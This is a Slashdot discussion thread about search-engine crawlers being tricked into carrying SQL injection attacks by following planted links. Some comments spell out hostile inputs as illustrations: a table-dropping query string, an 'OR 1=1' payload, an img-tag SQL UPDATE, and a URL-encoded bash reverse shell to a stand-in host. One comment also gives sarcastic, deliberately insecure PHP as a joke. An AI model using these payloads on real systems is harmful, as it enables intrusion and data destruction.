Forgot your password?
typodupeerror
Google Security

Google Bots Doing SQL Injection Attacks 156

Posted by Soulskill
from the it's-not-a-bug,-it's-a-feature dept.
ccguy writes "It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker. In this scenario, the bot was crawling Site A. Site A had a number of links embedded that had the SQLi requests to the target site, Site B. Google Bot then went about its business crawling pages and following links like a good boy, and in the process followed the links on Site A to Site B, and began to inadvertently attack Site B."
This discussion has been archived. No new comments can be posted.

Google Bots Doing SQL Injection Attacks

Comments Filter:
  • Doing a good deed for your competition by linking them from your site, hmm? :)

    • by Anonymous Coward on Tuesday November 05, 2013 @08:27PM (#45341301)

      TFA seems to place all the faults on Google.

      Fact is, Google is not the only one who is crawling the Net. Yahoo does it as well as Bing, among others.

      If the Google "bots" can be tricked into doing the "heavy lifting", so can the Yahoo "bots", Bing "bots", and "bots" from other search engines.

      • Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!

        Next you'll be suggesting that you could do that transparently to the user and have their browser re-use their already logged in session on another site to do things with their credentials for you!!!!

        What will they think of next? It's a good thing we have these wonderful stories to explain how this whole web thingy works with all it's links and stuff...

        • by icebike (68054) on Tuesday November 05, 2013 @09:16PM (#45341627)

          Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!

          Real people don't have to click that link. Their computers and devices have web browsers that follow links ahead of time to
          improve browsing experience. Chrome calls this "Predict network actions to improve page load performance".

          But such hits would come from a wide variety of IPs, not from Google.

        • by mysidia (191772)

          Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!

          Why not just include an iframe, and have an onload javascript of the parent page navigate the iframe to various links?

          • by _Sharp'r_ (649297)

            Exactly. That's the sort of thing I mean by "transparently to the user". Sorry if my sarcasm was too obscure.

        • by Anonymous Coward

          I scrolled a couple of pages down, but didn't see any SQL injection attack links. WHAT IS WRONG WITH YOU SLASHDOT?!

        • Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!

          This is actually very useful for more persistent attacks.

          1. Site A and Site B have both SQL injection vulnerabilities
          2. Site A is the real target, and site B is a high traffic site getting lots of visitors
          3. Site B somehow gets an <img width=1 height=1 src="http://www.site-a.com/cms?id=%3Bupdate content set text%3D'%3Cimg src%3D%22http://goatse.fr/hello.jpg%22%3E"--> tag added somewhere in its content
          4. Random visitor visits site B, visitor's browsers attempts to fetch the 1x1 pixel from site A
          5. Site A now looks
          • by _Sharp'r_ (649297)

            If they know what URL is being called to cause the problem, Site B might be able to figure out Site A from logs for the client's that include the Refer in their request for it, but once they've identified the URL itself, they can just fix the actual vulnerability or block that specific URL with a redirect or something similar.

            Once I found a major party's official state website allowed anyone to post and execute arbitrary PHP with full access via just filling in a comment text field, I stopped being surprise

      • by aztracker1 (702135) on Tuesday November 05, 2013 @08:48PM (#45341439) Homepage
        What's funny is bing has bots that will actually execute and follow through JavaScript requests... last year, I worked to refactor our link structure (normalizing, and reducing variance), this caused a reindex of the site (about 50k urls), however Bing bots went nuts, and because they executed JS, this really affected our unique visitors on our Google Analytics (they don't actually filter bots). It looked like our unique visitors went up by 40% (all from 3 locations, all Microsoft), while our pages per visit plummeted. Bots are necessary, but can be dangerous if you don't account for them.
      • TFA seems to place all the faults on Google.

        Fact is, Google is not the only one who is crawling the Net. Yahoo does it as well as Bing, among others.

        If the Google "bots" can be tricked into doing the "heavy lifting", so can the Yahoo "bots", Bing "bots", and "bots" from other search engines.

        Do not forget the NSA bots. The Chinese NSA equiv bots.
        The French NSA equiv bots....
        The FBI bots....

  • could not care less (Score:5, Informative)

    by Anonymous Coward on Tuesday November 05, 2013 @08:22PM (#45341269)

    not just "could care less". Sheeesh.

    • by Anonymous Coward on Tuesday November 05, 2013 @08:47PM (#45341425)

      Means the same thing irregardless.

      • by Anonymous Coward

        Means the same thing irregardless.

        I see what you did there.

      • by Anonymous Coward

        Means the same thing irregardless.

        Do you mean literally the same, or actually the same?

    • by JanneM (7445)

      Wouldn't be at all surprised if they do care just a little bit. making the orginal correct and your's not.

    • by sootman (158191) on Tuesday November 05, 2013 @11:40PM (#45342363) Homepage Journal

      It's probably laziness, but it could also be a shortened version of "I could care less, but I'd have to try."

      "Sure as hell" and "sure as shit" have no meaning either, right? How sure is hell, or shit? Those are shortened versions of "as sure as hell is hot" and "as sure as shit stinks". Language happens.

      I'm more concerned with errors on non-idiomatic speech, like "should of" and "could of" instead of "should have" and "could have", "try and" instead of "try to", and #1 on my list, "literally" meaning "figuratively".

      After we sort that out, we can come to an agreement on split infinitives, the Harvard comma, and people whether punctuation that isn't part of a quote should be inside quotation marks or out. :-)

      • It becomes a problem when the literal meaning is the exact reverse of the intended meaning. "Sure as hell" does not have another meaning. For natives that is no problem. Non natives have more trouble with this and I am sure I don't need to remind you that most people do not have English as their mother language.

        In a similar case I actually had a supplier put a line on a quote that translates to: "all products are available from stock if another date is mentioned in the line". What they meant was: "all pr
      • by GodGell (897123) on Wednesday November 06, 2013 @04:36AM (#45343241) Homepage

        I'm more concerned with errors on non-idiomatic speech, like "should of" and "could of" instead of "should have" and "could have"

        THIS, a thousand times this!
        I'm not much of a grammar nazi, as I view communication to be the primarry purpose of text and not syntax... but "should of" actively takes chunks out of my brain every time I read it. It honestly makes me feel like I'm trying to talk to a retard, it just makes so little sense.

        The worst part is, while currently it's almost exclusively native English speakers who make this mistake (which is pretty odd), soon enough people like me who learnt by practice are going to start using it en masse, and then it'll be here to stay (like "could care less" - another one perpetuated by native speakers, btw).

        • What about "try and do something" instead of try to? Seems to me try and is as common as should of.
        • I agree, "should of" must be avoided at all cost. He coulda used "shoulda" instead of "should of", it's a much more elegant solution.

          And before anyone gets started, yes, the damn punctuation should go outside the quotation marks, because that's where logic (not to mention everyone outside of America) requires it to be! Deal with it.

        • by mcgrew (92797) *

          I don't so much mind the ones that mark the writer as an idiot* so much as the ones that change the meaning of what the idiot was trying to convey. "Writing in Python will make you loose your mind." Well, isn't setting your mind free a GOOD thing?

          I have to laugh at a post that tries to be erudite by using "whom" (usually incorrectly) but doesn't know the difference between there, their, and they're. Those kinds of aliteracies really slow my reading down.

          As to being native speakers, I corrected a fellow here

          • by GodGell (897123)

            I have to laugh at a post that tries to be erudite by using "whom" (usually incorrectly) but doesn't know the difference between there, their, and they're. Those kinds of aliteracies really slow my reading down.

            Yes, those are probably even worse... It makes me wonder how they were taught to write English. Nowadays you almost semi-automatically pick up on English just by hanging on the Internet a lot of the time, even if you've never met a native English speaker. One would expect grammar to be improved by it as well, but apparently not...

            By the way, I learned two new words from your post, thanks :)

      • by gsslay (807818)

        "Sure as hell" and "sure as shit" have no meaning either, right?

        Well that's the point. Because they are totally meaningless as they stand, you know to look elsewhere to find the meaning. But omitting a "not" does not make "could care less" meaningless. It means something very definite, and the exact opposite of what is intended.

        The idea that it's a shortened version doesn't stand up. It simply isn't said that way with the required intonation or timing. People say it because the phrase has become a meaningless, something said without any thought to what it breaks d

  • Uhh... (Score:5, Insightful)

    by Anonymous Coward on Tuesday November 05, 2013 @08:23PM (#45341273)

    If you have http GET requests going (effectively) straight into your database, that's YOUR problem, not Google's.

    • Re: (Score:3, Informative)

      by Anonymous Coward

      I whole heartedly agree. Database programming 101: you cannot trust any inputs (user or otherwise). You must assume that any input is malicious and sanitize it as such. Maybe the devs that are researching/complaining about this should consider the target as the problem not the 12,000 different ways to input malicious code.

      • by Salgat (1098063)
        You still have to assume we're in a non-ideal world, which is very much true. Suppose there is a way to mitigate this issue on Google's end, is there something wrong with taking action to reduce the amount of attacks, even if the website is at fault?
        • Re: (Score:2, Insightful)

          by Anonymous Coward

          Suppose there is a way to mitigate this issue on Google's end, is there something wrong with taking action to reduce the amount of attacks, even if the website is at fault?

          Yes, there is something "wrong"- Google has no idea what is or is not a "malformed" request. You're basically asking Google to sanitize the database input, which is generally not possible if you don't know anything about what the database should or should not accept. adding something along the lines of 'user=root' or 'page=somekindofdata' to a query may be perfectly legitimate for one site, and a massive problem for a different one.

          • by Salgat (1098063)
            That's why I said "if there is a way". Obviously if it isn't feasible then they can't do anything about it.
      • by Anonymous Coward

        You must assume that any input is malicious and sanitize it as such.

        Not even that. For many text field, e.g. the Slashdot comment field, SQL statements can be a completely valid input. I coult be explaining to someone how to solve a problem in SQL, or I could be re-posting a "Little Bobby Tables" joke. All very valid, nothing malicious.

        Seeing SQL input (or Javascript, same problem) as malicious results in people writing filters that prevent posting answers to SQL (or Javascript) related questions. Seeing it

        • Not even that. For many text field, e.g. the Slashdot comment field, SQL statements can be a completely valid input. I coult be explaining to someone how to solve a problem in SQL, or I could be re-posting a "Little Bobby Tables" joke. All very valid, nothing malicious.

          I'd say it depends on the page's content. I really can't think of a valid reason for SQL statements or Javascript snippets in pages dealing about celebrity A or pet B or most other fields of interest outside of IT.

    • by Hoch (603322)
      Well, your SQL Database is secure, but you have an overzealous application firewall that starts blocking requests from google because they are sending SQLi and other detritus. Now your site blacklists Bing and Yahoo too. Soon you are out in the internet wilderness because you won't let any of the search engines into your site. Good luck with site promotion.
  • How is that news? Zalewski wrote a book on that years ago ("Silence on the wire")
  • by ChaseTec (447725) <chase@osdev.org> on Tuesday November 05, 2013 @08:27PM (#45341305) Homepage

    In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".

    • by Anonymous Coward on Tuesday November 05, 2013 @08:30PM (#45341315)
      This is Slashdot. What do we know about GET HEAD methods?
    • by Zapotek (1032314)
      That doesn't really have much to do with anything, a lot of DB connection/query libraries allow stacked queries to be performed (i.e. more than one queries, separated by ';') so by appending your own SQL query (say, a DELETE one) via a vulnerable input you can still do plenty of damage, even via a GET method.

      TFA isn't newsworthy in my opinion, this has been known for a while now.
      • The problem with this line of thinking is that spiders are only supposed to crawl links. If you use a live link without authentication, shame on you. If you use a query to a db for something like a parts catalog that's capable of r/w, then shame on you. If you tether your logic through a pipe, the pipe needs parser constraints on the query.

        Blaming Google or any other crawler-spider-bot, despite my other distain for Google, is pointing the finger at the wrong culprit. Everyone wants sub-second response times

        • by Zapotek (1032314)
          I'm not sure to which line of thinking you're referring, both myself and the GP just posted a technical remark each. Also (to my great joy and surprise) no-one is blaming Google (at least not yet) and rightly so.

          As for the back-end countermeasures you described, you are of course spot on, however it's safe to assume that if you're vulnerable to something as trivial and mundane as SQL injection, you won't have the required foresight to setup and use different DB roles, each with the absolutely least privs
          • Yes, we agree; it's the problem with blaming Google, and affirmation of the sillyness. In my mind, which didn't get presented, and I apologize, is that query code has become awful, let-me-count-the-ways.

            Further, when I'm forced, to, looking at page code makes me reel with revelation of the mindset of cut-and-paste APIs glued with mucilage (if it's that good). Everyone else now is to blame, not the moshpit of ducttaped code. Sorry, bad rant on a bad day.

        • If you want more performance, you should be using prepared statements and statement caching, not string concatenation to construct your queries.
          Then you don't need to waste CPU time and memory escaping input data.

      • by mysidia (191772)

        so by appending your own SQL query (say, a DELETE one) via a vulnerable input you can still do plenty of damage, even via a GET method.

        That would be a bug in the application.

        The HTTP spec doesn't let you say what could happen if there's a bug in the application. It could be designed so that all GETs are idempotent operations, but due to a bug they are not.

        For all I know; if there's a bug in the application adding ?X=FOOBAR&do=%2Fbin%2Fbash%20-i%20%3E%2Fdev%2Ftcp%2Fwww.example.com%2F80%200%3C%261

        • by Zapotek (1032314)
          I'd say that since half of the subject of this discussion is about SQL injection, the webapps in question are axiomatically buggy.
    • by d33tah (2722297)
      The trick is that retrieval can be dangerous by itself if you're using the database and forgot to sanitize your SQL. Being a moron can't be solved by an RFC.
    • by iONiUM (530420)

      Agreed 100%. This article is blaming Google for admins who had bad site design. Doing a GET should not have done this; it's their fault for embedding bad links in their HTML that is exposed to a crawler.

      • It's not the admins of the sites embedding the links that are the problem. They're they attackers. The fault lies with the admins of the sites the links point to.

    • by hawguy (1600213)

      In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".

      That's the funny thing about SQL injection attacks - it can turn a SELECT into a DELETE or UPDATE. So you may have *meant* your GET request to be a simple retrieval, but a successful attack could make it do so much more.

      Which is a great segue to the obligatory xkcd comic!

      http://xkcd.com/327/ [xkcd.com]

  • In the scenario listed, if you were the hacker trying to cover his tracks, how would you ever know if the attack was successful or not?
    • by Fwipp (1473271)

      If your rival's site suddenly had a 99% sale on all products. :)

    • by gl4ss (559668)

      the site goes down. you can then guess it worked.
      or a port opens at the target host, whatever the attack did.

      as for using it for DOS, the target site doesn't even need to be faulty.

  • Skype too (Score:5, Interesting)

    by gmuslera (3436) on Tuesday November 05, 2013 @08:52PM (#45341463) Homepage Journal
    If Microsoft follows links shown in "private" skype conversations [slashdot.org] (and probably several NSA programs too) they could be used to attack sites this way. Could be pretty ironic to have government sites with their DBs wiped from a SQL attack coming from an NSA server.
  • I vaguely recall an article years ago on something like TheDailyWtf where some idiot webmaster wrote a web application with links instead of buttons to perform tasks, and was confused why his site and data was getting trashed repeatedly, until he figured out it was the crawling bots.

    This is nothing new: unskilled developers using the wrong methods and getting burned.

    • by PRMan (959735)
      And there was a DailyWTF article where he couldn't publish because you could literally put people on a state's Megan's Law sex offender database list by changing the query used on the site.
  • What is going on?
    It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker.

    no, what's really happening is someone posted an injection url on a forum somewhere and googlebot ran across it. come on, google bot hasn't become sentient or som-SORRY THIS POST WAS A MISTAKE DISREGARD ALL INFORMATION.

  • by AndroSyn (89960) on Tuesday November 05, 2013 @09:39PM (#45341765) Homepage

    This guy(who I won't name, you know who you are), was once writing some PHP code for some webapp. Well in app, he had some delete links and he hadn't finished the authentication code apparently, so googlebot crawled is site, followed all of the delete links and completely wiped out his database.

    Of course, you can keep googlebot away from your crappy code with robots.txt too...

  • 'Someone failed at the most basic level here and it wasn't Google. From RFC 2616 (HTTP) Section 9.1 Safe and Idempotent Methods - "In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe"."`, Matthieu Heimer
    • by Qzukk (229616)

      I don't get it. What's unsafe about "select * from catalog where id=".$_GET["id"]?

      • by Bengie (1121981)
        Separate your commands from your inputs. The query sent to the DB should never change, only the parameters; and the parameter values should never be part of the query.
      • by dkleinsc (563838)

        I can't tell if you're serious, so I'm going to act like you are in case you or some other reader doesn't understand the problem:
        In the URL that you'd be using to hit that page, change the "id=42" or whatever you have there to "id=0 OR 1=1". Poof, your page is now reading the entire catalog in rather than the single record you wanted to. Hit that fast enough, and if that catalog is large enough, and the bad guy may have just brought your nice database server to a screaming halt as it loads up 300 million re

      • Re: (Score:2, Funny)

        by mysidia (191772)

        I don't get it. What's unsafe about "select * from catalog where id=".$_GET["id"]?

        Dude... you forgot to encrypt your databases.... it should be

        $catalogname = str_rot13('catalog'); $idname = str_rot13('id');

        $id = str_replace(';', '', $id, ); ... "select * from $catalogname where $idname=".$id

        Make sure to insist that register_globals is set to On in the PHP settings for the web server.

      • by scdeimos (632778)

        Assuming you're actually serious, what happens when your page is requested with: ?id=0;%20drop%20table%20catalog;

        Suddenly your query gets transformed to: select * from catalog where id=0; drop table catalog;

      • by Megane (129182)

        Because Little Bobby Tables. [xkcd.com]

        http://your.site/dumbass.php?id=10; DROP TABLE catalog; --

  • by ghn (2469034) on Tuesday November 05, 2013 @10:07PM (#45341891)

    The point is not that you can attack lousy website using GET requests. The idea is that HTTP firewalls shoud not blatlantly white-list google bots and other website crawlers in the sake of SEO optimization, because google bot will follow malicious links from other website..

    So lets say you have a filter with rules that prevent common SQL injections in GET requests parameters, this is a weak security practice but can be useful to mitigate some 0-day attacks on vulnerable scripts. This protection can be by-passed IF you white-listed google bot.

    • by Anonymous Coward

      If you think you need "a filter with rules that prevent common SQL injections in GET requests parameters", then you're doing something wrong.

      I know, I know -- protection in depth and all that. But some things are just too fucking ugly to even think of them. Ugh

  • So if you litter a page with malicious links, the attacks will look like they're coming from Google's servers.

    That's kind of cool, actually.

    I'd laugh my head off if Google were subsequently flagged as a malicious site. I *hate* bots.

  • by sootman (158191) on Tuesday November 05, 2013 @11:52PM (#45342419) Homepage Journal

    When I first started doing web apps, I made a basic demo of a contacts app and used links for the add, edit, and delete functions. One day I noticed all the data was gone. I figured someone had deleted it all for fun so I went in to restore from a backup and decided to look at the logs and see who it was. It was googlebot -- it had come walking through, dutifully clicking on every "delete" and "are you sure?" link until the content was gone.

    (I knew about when to use GET versus POST -- it was just easier to show what was happening when you could mouse over the links and see the actions.)

  • is awesome.
  • Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. Nobody cares.
    • by Megane (129182)

      Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. And nothing of value was lost.

      FTFY.

      • by ttucker (2884057)

        Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. And nothing of value was lost.

        FTFY.

        I do like that better. Thank you.

  • You'd have thought they learned their lesson when dealing with Bobby Tables, aka "Robert'); DROP TABLE Students;
  • So they do care a bit then?

    The Caring Continuum - http://incompetech.com/Images/caring.png [incompetech.com]

  • In several cases, the SQLi target was posted in a hacking forum, blog or exploit site, then Google bots perform a request to the link and indexes it (title, content).
  • My god, it's 2013 and where talking about SQL injection? If your not parameterizing your sql, your doing it wrong.

  • "couldn't care less"
    If you could care less it would not really be worth mentioning.

  • Even if you don't bother to edit your robots.txt file, I believe you can curtail this phenomenon by using POST rather than GET for links that change data

When you don't know what to do, walk fast and look worried.

Working...